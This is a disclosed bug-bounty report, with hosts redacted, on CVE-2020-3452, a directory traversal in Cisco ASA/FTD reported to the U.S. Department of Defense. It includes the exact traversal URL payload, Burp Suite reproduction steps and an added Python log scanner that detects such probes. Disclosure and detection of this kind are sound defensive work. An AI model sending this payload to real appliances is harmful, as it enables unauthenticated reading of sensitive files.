[CVE-2020-3452] on ███████
High
U.S. Dept Of Defense
Reported by
splint3rsec
Vulnerability Details
Technical details and impact analysis
The following subdomain is vulnerable to CVE-2020-3452, an unauthenticated directory traversal that allows arbitrary file read in the web services interface of Cisco ASA and Cisco Firepower Threat Defense (FTD) software.
# URL:
https://████/
# Vulnerable URL:
https://███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
██████████
# Resources:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
## Impact
The vulnerability could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.
## System Host(s)
███
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2020-3452
## Steps to Reproduce
* Go to https://██████/+CSCOE+/logon.html
* Intercept the request with Burp Suite
* Send the request to Repeater
* Change the URL path to `/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../`, as an example that reads the `/+CSCOE+/portal_inc.lua` file.
* The response contains the contents of `portal_inc.lua`.
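For defenders, the reproduction steps above translate directly into a detection rule: a request to `/+CSCOT+/translation-table` whose `lang` parameter carries a `../` sequence once URL encoding is undone. The following Python is an added example written for this page, not part of the report or of Cisco's advisory; it assumes the ASA/FTD web interface sits behind a proxy or WAF that writes requests in Apache common log format, and the log lines it scans are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format); not from the report.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2020:12:00:01 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 4121
203.0.113.5 - - [10/Aug/2020:12:00:07 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 9813
198.51.100.9 - - [10/Aug/2020:12:01:15 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=%252e%252e%252f HTTP/1.1" 200 9813
198.51.100.9 - - [10/Aug/2020:12:01:30 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal.lua&default-language&lang=en HTTP/1.1" 200 512
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_cve_2020_3452_probe(target: str) -> bool:
    """True when the request target has the translation-table path and a
    traversal sequence in the lang parameter after URL decoding. Decoding is
    applied twice so double-encoded dot segments are caught as well."""
    parts = urlsplit(target)
    if parts.path != "/+CSCOT+/translation-table":
        return False
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer
    for value in params.get("lang", []):
        decoded = unquote(value)                             # second layer
        if "../" in decoded or "..\\" in decoded:
            return True
    return False

def scan_log(text: str) -> list:
    """Return one dict per matching request: source, timestamp, HTTP status and
    the textdomain value (the file the request was aimed at) for triage."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or not is_cve_2020_3452_probe(m["target"]):
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        hits.append({
            "src": m["src"],
            "ts": m["ts"],
            "status": int(m["status"]),          # 200 suggests the read succeeded
            "textdomain": query.get("textdomain", [""])[0],
        })
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 200 response on a flagged request means the appliance is likely unpatched and the named file was served; correlate with the Cisco advisory linked above for the fixed releases.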
## Suggested Mitigation/Remediation Actions
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2020-3452
HIGH
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input …
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Path Traversal